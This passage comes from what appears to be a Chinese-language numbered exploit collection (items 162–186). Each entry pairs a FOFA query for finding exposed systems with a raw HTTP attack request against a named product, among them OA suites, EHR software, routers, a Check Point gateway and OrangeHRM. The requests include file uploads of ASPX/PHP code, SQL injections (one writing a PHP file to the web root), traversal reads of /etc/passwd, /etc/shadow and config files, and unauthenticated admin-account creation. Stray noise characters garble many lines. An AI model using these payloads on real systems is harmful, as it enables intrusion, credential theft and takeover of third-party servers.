* U( z5 ^" L6 R+ M' c* F* `http://x.x.x.x/dizxdell.aspx
; x" c1 p! G7 j- l7 w8 e' q
" p, N% p- t% F' t* W162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传
8 E3 t6 C9 J3 Y. Y7 l$ m: ]FOFA: app="和丰山海-数字标牌"
% ^( I+ A# \2 q. H6 gPOST /QH.aspx HTTP/1.14 q& m3 w: Y i0 Q. Z
Host: x.x.x.x
/ _+ a7 u: ?+ q3 y3 Z. F: NUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
! h* w+ T0 P+ X" M8 ?7 Q" @Connection: close1 @% y8 A6 m2 g
Content-Length: 583
* d1 @5 `7 z, r% O6 t* T9 XContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey0 n% G6 r; ?9 o) d; c
Accept-Encoding: gzip( b9 D" I! u, s) X, Q6 b- x5 }: S; w
( d6 R5 n2 u O------WebKitFormBoundaryeegvclmyurlotuey* D7 V" n6 N: z# L
Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"
! i& W0 [3 C. t% eContent-Type: application/octet-stream7 w+ a% Z+ `7 F) ~
7 F( ]- E+ N7 O* y5 ]& e
<% response.write("ujidwqfuuqjalgkvrpqy") %>" e L! I: x* T n5 N5 D4 W- D! i2 r
------WebKitFormBoundaryeegvclmyurlotuey
* u: h5 m( H3 p" A, CContent-Disposition: form-data; name="action"& ?( l0 x7 K2 x+ y9 `" |9 v
- i/ C2 P, a; g! Hupload; @% n' g7 e5 P
------WebKitFormBoundaryeegvclmyurlotuey8 b. C5 r. I; P$ ^$ ^: o, W- F
Content-Disposition: form-data; name="responderId"
6 G* e. W) B8 j4 ]6 ~9 }* V8 d% e! N* |
ResourceNewResponder9 L$ E; b6 z/ ?( U
------WebKitFormBoundaryeegvclmyurlotuey
- I" G7 r& l9 N- Q. PContent-Disposition: form-data; name="remotePath"; D" C) h- d) A% i
/ c9 h$ \3 m( Z( t/opt/resources0 r5 v) N" `+ B C! K. e. V; V
------WebKitFormBoundaryeegvclmyurlotuey--
8 }. T$ n3 j+ O. p8 l/ e0 _' c
( L* U: H) o6 ^8 F2 U: X
; ?) O+ E( X# e6 Fhttp://x.x.x.x/opt/resources/kjuhitjgk.aspx4 g1 V. H6 }( u
1 p# e9 e- {% J1 b163. 号卡极团分销管理系统 ue_serve.php 任意文件上传) ?% H+ T8 u2 s2 I, C& g6 b
FOFA: icon_hash="-795291075"
8 h& e1 i2 J( T# o% |POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1
, c( X" ^/ F7 xHost: x.x.x.x% V' k9 A' D9 H0 _$ E7 N
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
5 N9 c4 k4 x6 p" {Connection: close( H9 E" y' U0 S# Y' H( j, d
Content-Length: 293
{1 ?. h) S8 r0 CAccept: */*# @& S7 n% \/ h9 J$ O4 ?' o
Accept-Encoding: gzip, deflate
: w, C9 A4 V' }7 s8 M) uAccept-Language: zh-CN,zh;q=0.9; m/ Y6 W# y5 ~( L0 h# n% x0 c
Content-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod
r. z; u0 V% R& ^+ l
' ?4 |) C2 y' J" u------iiqvnofupvhdyrcoqyuujyetjvqgocod* i, ^# `1 \% R% q/ Y
Content-Disposition: form-data; name="name"
+ b& O0 S8 u1 V* l0 X
. {$ p" t6 B2 W; T1.php
' A# u1 v3 m1 |$ S------iiqvnofupvhdyrcoqyuujyetjvqgocod a q, s! l; c6 z
Content-Disposition: form-data; name="upfile"; filename="1.php"" I* k8 v) ~; y- n/ L/ P8 H& |
Content-Type: image/jpeg) l7 C/ \9 w6 h2 U6 |
O# ^: |! u; [3 I
rvjhvbhwwuooyiioxega
1 _- o/ t) X3 ]4 k- ^+ j. X------iiqvnofupvhdyrcoqyuujyetjvqgocod--" U; N/ [9 }5 \( K9 Y# z6 ^7 B
; j l7 ^( R2 ~, w- J A2 c. z2 {; _* V" B- U
164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传0 H- U. d9 I) s2 m$ @1 n' V& ~/ z
FOFA: title="智慧综合管理平台登入"; L/ _" S3 o( o# `
POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1) x* [' m& j0 p N* t' g1 v1 J
Host: x.x.x.x
+ r% \. {0 Y$ v& x7 j7 e g, A! yUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
( P! _& M2 W+ iContent-Length: 288
% g' P) g. p2 y+ FAccept: application/json, text/javascript, */*; q=0.015 k6 l0 s- g4 f/ Z7 g: q5 ?
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2,0 {, i# w% |9 x* F) V7 Y U- b
Connection: close* ]- ^. C, {. m0 U3 i* a# f
Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl
' @( u; I9 ~4 N* _: | ]3 oX-Requested-With: XMLHttpRequest( C1 q3 Q3 V& B4 D6 p: p" ?
Accept-Encoding: gzip
F/ G( z2 A( ~3 C' ^" s7 ?8 M0 Q+ Z* V( I: l" u* Q6 M, }5 O
------dqdaieopnozbkapjacdbdthlvtlyl
$ @* R+ n( B' n/ p7 RContent-Disposition: form-data; name="Filedata"; filename="qaz.aspx"
1 K! z9 J. k: \. [5 d9 N7 S' u& VContent-Type: image/jpeg. f& i. y, m; X4 Z7 X# J _- E
& P* e0 i" C/ Z5 D/ C<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>
$ `( d) B' F/ a# K: g! T% ` E6 U------dqdaieopnozbkapjacdbdthlvtlyl--! C; J. |$ T* u/ C3 V( H
+ ?, b, l9 T9 U' A; I% t, @
1 X _6 S$ A, i4 r" d+ @# {
http://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx
& k% ` B- F: q4 D. ^
! Q! f+ @# m3 q7 ~; Z165. OrangeHRM 3.3.3 SQL 注入* u8 `4 G. b6 X
CVE-2024-36428
0 B' M$ f7 r6 N; Y. N& TFOFA: app="OrangeHRM-产品"
8 I' ]& X& l4 D2 d- JURL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))
3 A; W. K9 O7 \* F) N8 B' l) q# a, L. q2 Q) Z' Z
) m& a+ g" a, z4 H166. 中成科信票务管理平台SeatMapHandler SQL注入
9 _' z8 \! w4 M; c% VFOFA:body="技术支持:北京中成科信科技发展有限公司"; S* b# J. z7 t' I% b; x3 F& E
POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1
* T7 u5 V$ T# U, K0 z2 l: xHost:
' R6 x" u6 `3 A7 E9 hPragma: no-cache
3 R5 d2 Y+ Z) CCache-Control: no-cache" O8 V& c) u1 i* Q' U( q
Upgrade-Insecure-Requests: 1
" o% }' J' P8 ~. m; B& tUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
( @: f- N) |- S5 e( m. _Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+ c: W9 A0 M% o6 V; cAccept-Encoding: gzip, deflate" I4 j1 P# p+ Q3 f' A( F
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
+ I; m7 L6 t, ^. V/ ^: NCookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE
4 g( M1 T9 _* r `4 `5 e) AConnection: close; ?3 K. z+ w2 i# O# h
Content-Type: application/x-www-form-urlencoded W5 |3 q+ x. U8 k$ T
Content-Length: 89
7 N3 {' c3 _3 E: E; f2 u; A8 w7 k- P% X$ F
Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE
8 B6 Y3 w4 }0 j% }
. w/ w: v5 T6 T" H& ]& [$ n& G5 Y) \8 x0 y' U
167. 精益价值管理系统 DownLoad.aspx任意文件读取/ C% O- c: n! Q
FOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"( L( @ F* D* ^- O% q* E: C
GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1/ v- \7 t- |6 f3 j2 v) p
Host:0 v) b2 _" q0 C7 e1 q( y- G
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
% c \% c- B9 l8 Y* N; b; _Content-Type: application/x-www-form-urlencoded% S1 k( J- [' I) e
Accept-Encoding: gzip, deflate! n0 j8 P5 F/ S' ~9 K' W8 Z6 j6 Y$ O
Accept: */*
# Q- m7 c& K6 M& E b8 r( _: q8 [Connection: keep-alive) z: H5 O& ]# Z- m
5 Z' c5 B, V; ^# r, e7 ^; E% u
6 r, e( L, e/ x1 r/ Q! n168. 宏景EHR OutputCode 任意文件读取
* y( V7 O: E" }% V/ j, ~FOFA:app="HJSOFT-HCM"0 w) a' O; n4 a S( p" f% M. D) k
GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1
4 {4 [% @' J5 m* V7 Z" \& wHost: your-ip. @ D0 F4 U3 y4 F9 x3 v F
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
% e4 i g: V/ d5 b- f0 EContent-Type: application/x-www-form-urlencoded* q0 Q3 B" \9 A" O
Connection: close
2 @, X; s9 A7 Y0 E$ r! K' Q: S
7 ^( m: o9 i" ]) s2 f
4 G1 C) ? \3 i2 j r$ s8 }$ j8 M( w6 T: _5 H
169. 宏景EHR downlawbase SQL注入' W+ v f) m& W5 T
FOFA:app="HJSOFT-HCM"
8 p* k. G% ], t& Q0 w* LGET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1- t. @& X7 F- X
Host: your-ip3 b8 q' Y: O' E; v/ r1 h p: T
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
' C, l8 Y. O O1 z1 Q4 W2 eAccept: */*
7 f) r* h. T) _1 E$ z, i+ eAccept-Encoding: gzip, deflate( H5 f* \* O& r- V J6 V
Connection: close
- w/ g1 d" b/ w; t; o
, |1 K. n! k* q( \4 U k
0 U" H* C1 Z5 C1 d7 O" b; ]$ q7 }; I3 O. m; z( ]2 {& z$ {
170. 宏景EHR DisplayExcelCustomReport 任意文件读取9 B5 L3 G0 D0 \: s
FOFA:body="/general/sys/hjaxmanage.js"
; m" `$ c4 d, U2 H& NPOST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.10 d9 {/ f B# d
Host: balalanengliang7 }: o. L! }$ d# A) W4 W. }; G z, _
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
+ O5 O; n0 a2 s% n# {; U& i* vContent-Type: application/x-www-form-urlencoded n8 X" x6 {0 m+ u/ d# C( i
( l9 \7 C1 K. @/ \7 p7 R! qfilename=../webapps/ROOT/WEB-INF/web.xml4 W! D' X2 u$ n" w
' D( M/ r2 e2 p& B% c) p4 v' j
" Y0 R0 A( {& h
171. 通天星CMSV6车载定位监控平台 SQL注入* |& f+ {2 k. e! }2 Q0 W o7 V
FOFA:body="/808gps/"- z' u: O9 e5 b0 ?" ]
GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1
" }- U4 Q h+ s9 G, L( ^. l5 j1 SHost: your-ip8 l9 x. T3 d" I/ n' |) J
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0) s1 \7 J+ b% j. x2 B
Accept: */*
( _- a/ f; i* Q. x# i8 [, TAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2' [0 K! S# x8 S/ _" y
Accept-Encoding: gzip, deflate
( L$ i) D" c1 E9 D& e/ Q5 F7 TConnection: close
! O6 h* T, P9 s: P% A# |
% z% j3 i; A& E& v4 c# u. t
# D& y! @3 m a0 ]$ e
- b3 X, o; a, S6 ]/ i/ r; }$ y172. DT-高清车牌识别摄像机任意文件读取
8 X% I p7 x/ M( c9 pFOFA:app="DT-高清车牌识别摄像机"% Q1 H8 e x8 u }$ J! e
GET /../../../../etc/passwd HTTP/1.1
+ E' C+ ~' W' y3 |& Q6 G* C4 f+ n- r- hHost: your-ip
! K1 u7 s6 R) N1 tUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
: E' H* j* x v+ e0 @Accept-Encoding: gzip, deflate
% C- d- z: C s9 CAccept: */** ^! Z, O: N+ [1 j1 [/ ^$ ^" Q
Connection: keep-alive$ R, Z$ ^# Y& m& G
" h6 \8 c& W/ U- S
! T4 T! j- e1 q; E$ K
7 L& Q; o6 J# @, H, H173. Check Point 安全网关任意文件读取: J$ S" Z7 ^6 Y8 g+ B- [: s
CVE-2024-24919
y7 V, n4 u S. c2 a3 OFOFA:app="Check_Point-SSL-Network-Extender"+ s8 D& Y# V( N1 o8 \! `/ u
POST /clients/MyCRL HTTP/1.1! W$ e. C$ S# M" U
Host: your-ip
1 j. g" F! M. qContent-Type: application/x-www-form-urlencoded! t- S0 d1 c3 Y8 O9 J- ^! _( r9 d' J
% K+ C2 w8 v: A: e+ p- `
aCSHELL/../../../../../../../etc/shadow4 }) h, `% D4 b2 v8 ~
# [, y I7 |( S- i. D' ~, o5 T& a V
& c4 R9 _/ x6 u7 M- _
174. 金和OA C6 FileDownLoad.aspx 任意文件读取( T1 @: v' G- ^' s
FOFA:app="金和网络-金和OA"
* P# y. I8 n3 @' n9 n% ZGET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.17 Z0 Z8 F% W: [& ^1 u
Host: your-ip
n5 K3 ], p- ]. f# G p% Q: XUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
% g, {" h; |1 ~, b# MAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7- d8 [1 B2 b' {: W5 z% e" X$ _/ @
Accept-Encoding: gzip, deflate, br% ^" M8 m) p, O w B4 h; {1 Q
Accept-Language: zh-CN,zh;q=0.9( ]/ o* ^) P" ]$ d) K q
Connection: close
' M( o: ]% \: K- f% B" v. w
: B. r4 C8 k, |& _3 n$ a4 T8 ~: e
! h+ B, @/ |1 [9 v$ q5 Q
& p. R7 O3 P: \- o& ?175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入
- P+ F$ d" ]& b, Z7 zFOFA:app="金和网络-金和OA") U+ k9 {7 e5 P! P/ S9 H
GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1! T2 E5 [- o: L- y! ?9 T! ]
Host:
; Q0 x$ V" D/ K: [3 E6 hUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
' H0 ]% c3 N4 d. j4 [Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8/ ?" I0 z. A4 P! u
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2# t% v1 v9 c6 I5 O5 b9 R4 C/ e
Accept-Encoding: gzip, deflate
" [" |) V0 A0 N1 U; `Connection: close1 v- U; f8 C3 d1 j4 [9 x
Upgrade-Insecure-Requests: 1
- ?2 V& O8 i& I2 ?2 \2 R( J0 H: p! t( H: I" ?
' ?' s: S# ?! h) C8 A
176. 电信网关配置管理系统 rewrite.php 文件上传! I7 B a# a3 M5 p$ F3 o1 I
FOFA:body="img/login_bg3.png" && body="系统登录"# V8 L# o q: O
POST /manager/teletext/material/rewrite.php HTTP/1.1
% ]' S9 i& _- P. C" l( f" |! jHost: your-ip- v9 K% D2 p H$ k5 K
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0* [7 i! P* m# Y! F; n/ \/ q) ^
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT
) _& Q- O, x# IConnection: close
" O5 g1 C- t) P$ O! _6 i
! ?5 v! X: g5 j# r; |* j" G------WebKitFormBoundaryOKldnDPT
: m' F/ U/ j8 @Content-Disposition: form-data; name="tmp_name"; filename="test.php"7 S$ G! Y: c1 J
Content-Type: image/png5 ]- t- f. n7 e* s
% a" E/ y! Z; r: d
<?php system("cat /etc/passwd");unlink(__FILE__);?> x: F, [9 n1 g) k K8 C" F
------WebKitFormBoundaryOKldnDPT
8 u# W8 Y5 t# d# w8 sContent-Disposition: form-data; name="uploadtime"
, B0 c+ g" c. h
8 r# w4 `+ q" j! P
- j; W/ M4 M( u% s; L) J------WebKitFormBoundaryOKldnDPT--
: `. S! \7 a& g/ }0 c5 k
/ T$ @! T3 o( W; C8 f& T* }) \$ Q
1 v9 | m/ L4 y6 N3 O) L' S
177. H3C路由器敏感信息泄露
( p8 u0 o, W2 H0 i& Y, N/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg+ p7 f% @% ^6 U% @
/userLogin.asp/../actionpolicy_status/../M60.cfg5 S6 b) o! C5 R: |; |$ _& s: ^) i
/userLogin.asp/../actionpolicy_status/../GR8300.cfg& Y6 D; N: n0 v
/userLogin.asp/../actionpolicy_status/../GR5200.cfg- C( N0 a$ w, p5 S+ }! U
/userLogin.asp/../actionpolicy_status/../GR3200.cfg
/ X0 n8 h% T9 {# r0 m/userLogin.asp/../actionpolicy_status/../GR2200.cfg
3 b% t1 n! g6 A4 u5 G* u/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg) v# t# Q' o0 O- |& U6 j
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg( V* |! p% w: O8 S% P
/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg
7 N; P" r* C. x$ L0 ?/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg" C8 M1 q0 U7 Z
/userLogin.asp/../actionpolicy_status/../ER5200.cfg
* i$ m3 m) m' X/userLogin.asp/../actionpolicy_status/../ER5100.cfg
8 Q; L# C1 t o8 z8 |4 J4 q/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg' ?% O& a, S2 l( a& r, o
/userLogin.asp/../actionpolicy_status/../ER3260.cfg( A7 d4 v% e, t& E
/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg& J; A+ ?" n7 F1 ?
/userLogin.asp/../actionpolicy_status/../ER3200.cfg
. Z: ?( s% H: k0 N/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg/ `# J3 q5 w& H7 A f( n1 A" _
/userLogin.asp/../actionpolicy_status/../ER3108G.cfg
4 V6 a4 ^. C( D" [4 T9 Y/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg
2 H/ o# ?9 r l# X2 Z/userLogin.asp/../actionpolicy_status/../ER3100.cfg c' p( G$ U- O9 E) a& y5 @: V
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg$ E5 i K. v9 @. i3 f
% e8 ^0 c! \- ^( c( U
% b9 H2 }' e& F* d1 o( K" {
178. H3C校园网自助服务系统-flexfileupload-任意文件上传
6 L/ T/ X+ p4 y7 p) m& x, }FOFA:header="/selfservice"6 Y8 ^, l0 T# J& w4 O; _- X
POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1/ k0 X. k l- e9 R8 B! i
Host:
" S1 c: I; K: s6 O( TUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
8 e* h, n* f$ ]6 hContent-Length: 2521 b* @( s5 ~$ a! a, M" X4 h
Accept-Encoding: gzip, deflate0 G, r0 I* t6 n; J2 T
Connection: close
2 K+ Y1 L4 g, _- ?Content-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l
1 W* D9 a2 o. _* f( a0 m-----------------aqutkea7vvanpqy3rh2l; C; `8 |/ C8 P, x; Q" _
Content-Disposition: form-data; name="12234.txt"; filename="12234"
2 C9 \" v' j0 ?7 YContent-Type: application/octet-stream
. I) \1 N; O& k2 }6 oContent-Length: 255
2 r8 `1 o; h" L5 ?; A: M% T" b% m3 l+ D+ _1 a/ p
122341 h0 Z' B Y' L6 r: ?( |
-----------------aqutkea7vvanpqy3rh2l--
$ Z( P5 i4 M' T2 j
( a3 Z# Z- O, }* j
) d8 F: T H2 N0 m W/ z' eGET /imc/primepush/%2e%2e/flex/12234.txt
7 V* B5 _3 a. k
/ t' J: M2 _, }. ?1 m8 H0 R/ d" h4 X; k& ~4 ~/ ?. C$ Q G! g* g
179. 建文工程管理系统存在任意文件读取
6 D. p% i0 @0 d1 l, e& jPOST /Common/DownLoad2.aspx HTTP/1.1
) _4 o2 M8 ~+ g, Q3 s1 VHost: {{Hostname}}
1 l) H9 p+ g5 e' mContent-Type: application/x-www-form-urlencoded3 T+ B9 _& v- @# |, t5 {: P
User-Agent: Mozilla/5.0" y" Z; d" `4 T+ e2 F+ F! y
! Y; {9 F" `1 j
path=../log4net.config&Name=# z# _) {* Q# B2 C
8 A/ R t9 X n/ `8 c% `1 X: ?
W/ _" h I; v8 h
180. 帮管客 CRM jiliyu SQL注入9 D% v: F8 q5 W/ t4 }3 x
FOFA:app="帮管客-CRM"
. | K5 I2 x3 ~! d, z" UGET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1
7 \" Y' C' a( M' HHost: your-ip! Q& |- b. j4 ?# u% |
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
; `# ~- A/ F+ x# lAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7# Q T# M( j; R6 _) ]7 l
Accept-Encoding: gzip, deflate) R; D8 v( |4 i9 m x- c
Accept-Language: zh-CN,zh;q=0.9 b8 }% O4 P3 G" m1 r; Z* x
Connection: close- F( k8 Y% B1 i* n# b, k
: h8 g& n# _( P
5 E! k& y3 |2 A5 o181. 润申信息科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入
( M. u; @0 M" XFOFA:"PDCA/js/_publicCom.js"
# B) P9 V3 T3 iPOST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1
5 Y0 k m3 k. _0 cHost: your-ip
4 ~) @. f( f5 G; u& a/ D9 W1 VUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
0 f: F( t z) E- u* aAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
4 c! G; C9 J# v# z! c; C, |Accept-Encoding: gzip, deflate, br
* F' q/ {6 Y( |6 g% WAccept-Language: zh-CN,zh;q=0.9
/ d& m/ y7 j: c7 tConnection: close
4 S+ u+ |, C' [/ W2 W# @Content-Type: application/x-www-form-urlencoded
! [. k2 x1 [* R. h& I6 w; @ R: \; j/ x" }
5 F) p& g# U! l: Q Faction=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20
6 I2 h0 Q6 X9 n8 Y8 J! }; E
4 p. K5 T) S" M' u7 z3 M' O8 H5 O. Q, Y2 R! {( n& j
182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建* d+ w, A6 W3 M( H6 }1 x3 G
FOFA:"PDCA/js/_publicCom.js"( G# q* |: \, w' { ]5 q, L/ E& t/ R2 c
POST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1
8 r4 R9 f# e- u Q. r; B SHost: your-ip2 U2 {5 a1 ~. c) f6 z: g& z+ T s
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
5 [ w* s/ E# [+ b5 C' T/ TAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
/ K; t' U1 }, T' y" O5 FAccept-Encoding: gzip, deflate, br
0 U# p7 o2 {5 I+ N7 KAccept-Language: zh-CN,zh;q=0.9
& u; v8 R. y( WConnection: close& q2 p9 O& Y: d; H" E# L4 s
Content-Type: application/x-www-form-urlencoded7 W: F6 S. ?# B
, J8 @( x m3 s) O+ V1 y8 M8 s* [, W
username=test1234&pwd=test1234&savedays=1
9 K2 q) k0 S; q8 F+ j; c
% L! Y+ r9 a3 e7 V, ~( H' s0 W# ^
183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入
2 I# v0 K8 z5 eFOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"7 B( Q: g0 w$ L$ {) u! g
GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1, o3 |7 V/ f7 s' L/ k
Host: your-ip
: j! N" l4 `0 ^8 y% e5 [, k( kUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36) _7 o7 L" ]! _$ |! X
Accept-Charset: utf-8
+ I" f; s3 D d6 N \% o: r; rAccept-Encoding: gzip, deflate4 p1 J" o6 Z% v. `
Connection: close
+ C( Q3 L, T7 [2 c+ |/ b) l
# J' W& p7 a5 `: }$ ^6 Q2 C- P0 E0 J
184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加
" S2 S8 l* w/ O* V1 _( Z0 n; PFOFA:server="SunFull-Webs"
, X: H. b9 U$ L, J. R2 n2 T, nPOST /soap/AddUser HTTP/1.1# ]' S# q2 ^! E# h0 y
Host: your-ip* ~4 u: i3 V( y- j; q/ T8 A0 _( \
Accept-Encoding: gzip, deflate: z+ N# s3 }1 r% m ^3 | r* i) J
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
8 _6 U! c7 w* O$ p: R6 mAccept: application/xml, text/xml, */*; q=0.01
& H5 X9 C0 F% d6 L k8 ~Content-Type: text/xml; charset=utf-88 H$ ^8 Y; b' c; v7 e( @( `9 w
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2: ]2 `% P) i/ f ]6 J* t# k
X-Requested-With: XMLHttpRequest
2 `' O- W5 y% L+ ~+ u' [5 e0 V
# M- b4 G) S/ ?9 F: i5 g- Q, H2 G8 H, H5 N8 ^2 l8 a7 U: E+ q' _
insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')
2 U; A/ r9 l8 a3 H: ? p
4 e' i+ @$ t, x) _
' y# U; p6 I5 K9 a Q" L6 y: H& F4 f& H185. 瑞友天翼应用虚拟化系统SQL注入
: @! D4 d- R# _# j1 Lversion < 7.0.5.1
) e$ F/ J6 o, G0 F1 ?+ hFOFA:app="REALOR-天翼应用虚拟化系统" W: r" a' I! R) D' Z
GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1
* | b$ c, b8 q+ ]9 a4 I: yHost: host
& a' q5 \/ s3 q& G
2 z1 ]7 X) K4 j+ M1 \6 h3 x
& `6 c" W7 o( w186. F-logic DataCube3 SQL注入
. x* L' y( |: N4 U/ PCVE-2024-31750
9 x+ l' \1 X' T D( \F-logic DataCube3是一款用于光伏发电系统的紧凑型终端测量系统# j( u# x! Z9 C% O( d. ]
FOFA:title=="DataCube3"( ~5 S, L9 B: _5 Q
